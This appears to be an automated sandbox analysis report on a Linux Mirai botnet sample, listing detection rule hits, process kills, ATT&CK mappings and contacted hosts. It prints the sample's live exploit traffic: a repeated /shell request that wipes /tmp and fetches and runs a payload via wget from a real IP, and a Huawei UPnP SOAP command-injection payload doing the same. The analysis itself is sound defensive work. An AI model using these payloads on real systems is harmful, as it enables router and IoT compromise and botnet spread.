      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: file1, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
      Source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
      Source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
      Sample tries to kill multiple processes (SIGKILL)
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2018, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2077, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2078, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2079, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2080, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2083, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2084, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2156, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5234, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5235, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5236, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5237, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5238, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5239, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5250, result: successful
      Source: file1, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: file1, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
      Source: 5227.1.000000001c6cffe8.00000000ef7785b3.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5225.1.000000001c6cffe8.00000000ef7785b3.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
      Source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
      Source: Process Memory Space: file1 PID: 5225, type: MEMORYSTRMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: Process Memory Space: file1 PID: 5227, type: MEMORYSTRMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2018, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2077, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2078, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2079, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2080, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2083, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2084, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 2156, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5234, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5235, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5236, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5237, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5238, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5239, result: successful
      Source: /tmp/file1 (PID: 5231)SIGKILL sent: pid: 5250, result: successful
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: classification engineClassification label: mal96.spre.troj.lin@0/1@60/0
      Source: /tmp/file1 (PID: 5231)File opened: /proc/5140/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/5143/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1582/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2033/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2275/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/3088/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1612/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1579/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1699/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1335/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1698/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2028/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1334/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1576/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2302/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/3236/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2025/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2146/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/910/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/912/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/517/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/759/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2307/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/918/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/4460/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/4461/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1594/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2285/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2281/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1349/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1623/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/761/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1622/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/884/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1983/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2038/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1344/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1465/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1586/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1860/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1463/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2156/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/800/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/801/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/5029/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1629/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/4458/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/4459/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1627/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1900/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/3021/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/491/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2294/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2050/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1877/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/772/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1633/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1599/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1632/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/774/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1477/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/654/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/896/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1476/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1872/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2048/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/655/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1475/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2289/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/656/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/777/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/657/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/658/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/419/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/936/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1639/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1638/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2208/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2180/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/5174/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/4482/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/5175/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1809/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1494/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1890/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2063/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2062/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1888/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1886/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/420/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1489/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/785/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1642/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/788/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/667/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/789/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1648/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2078/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2077/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2074/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2195/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/670/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/2746/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/793/cmdline
      Source: /tmp/file1 (PID: 5231)File opened: /proc/1656/cmdline
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5238)Directory: /home/saturnino/.cacheJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5238)Directory: /home/saturnino/.localJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5238)Directory: /home/saturnino/.configJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5250)Directory: /home/saturnino/.cacheJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5250)Directory: /home/saturnino/.localJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5250)Directory: /home/saturnino/.configJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5250)Directory: /home/saturnino/.configJump to behavior
      Source: /usr/bin/dash (PID: 5217)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bhkKqn6VLL /tmp/tmp.RuRqJkNDuA /tmp/tmp.FX40reyTu0

      Hooking and other Techniques for Hiding and Protection

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52114 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44352 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37924 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41612 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37090 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53452 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55556 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55556 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55556 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55556 -> 37215
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5237)Queries kernel information via 'uname':
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5238)Queries kernel information via 'uname':
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5239)Queries kernel information via 'uname':

      Stealing of Sensitive Information

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: file1, type: SAMPLE
      Source: Yara matchFile source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: file1, type: SAMPLE
      Source: Yara matchFile source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
      Hidden Files and Directories      		1
      OS Credential Dumping      		1
      Security Software Discovery      		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Service Stop
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      File Deletion      		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
      Non-Standard Port      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer5
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits3
      Ingress Tool Transfer      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings

      Malware Configuration

      No configs have been found

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 575100 Sample: file1 Startdate: 19/02/2022 Architecture: LINUX Score: 96 29 cnc.luxstresser.xyz 2->29 31 197.191.38.219 zain-asGH Ghana 2->31 33 99 other IPs or domains 2->33 35 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 4 other signatures 2->41 8 dash rm file1 2->8         started        10 xfce4-panel wrapper-2.0 2->10         started        12 dash cat 2->12         started        14 13 other processes 2->14 signatures3 process4 process5 16 file1 8->16         started        18 wrapper-2.0 xfpm-power-backlight-helper 10->18         started        process6 20 file1 16->20         started        23 file1 16->23         started        25 file1 16->25         started        27 2 other processes 16->27 signatures7 43 Sample tries to kill multiple processes (SIGKILL) 20->43

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      file153%MetadefenderBrowse
      file171%ReversingLabsLinux.Trojan.Mirai
      file1100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      cnc.luxstresser.xyz
      		unknown
      		unknowntrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+true
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://schemas.xmlsoap.org/soap/encoding/file1false
          		high
          https://ubuntu.com/blog/microk8s-memory-optimisationmotd-news.20.drfalse
            		high
            http://schemas.xmlsoap.org/soap/envelope/file1false
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              151.226.166.50
              		unknownUnited Kingdom
              		5607BSKYB-BROADBAND-ASGBfalse
              14.228.128.141
              		unknownViet Nam
              		45899VNPT-AS-VNVNPTCorpVNfalse
              197.59.229.32
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              41.35.35.134
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              210.165.251.143
              		unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
              134.120.216.174
              		unknownUnited States
              		10455LUCENT-CIOUSfalse
              168.222.253.185
              		unknownUnited States
              		2386INS-ASUSfalse
              156.92.15.66
              		unknownUnited States
              		10695WAL-MARTUSfalse
              197.136.25.2
              		unknownKenya
              		36914KENET-ASKEfalse
              41.99.68.177
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              74.64.23.25
              		unknownUnited States
              		12271TWC-12271-NYCUSfalse
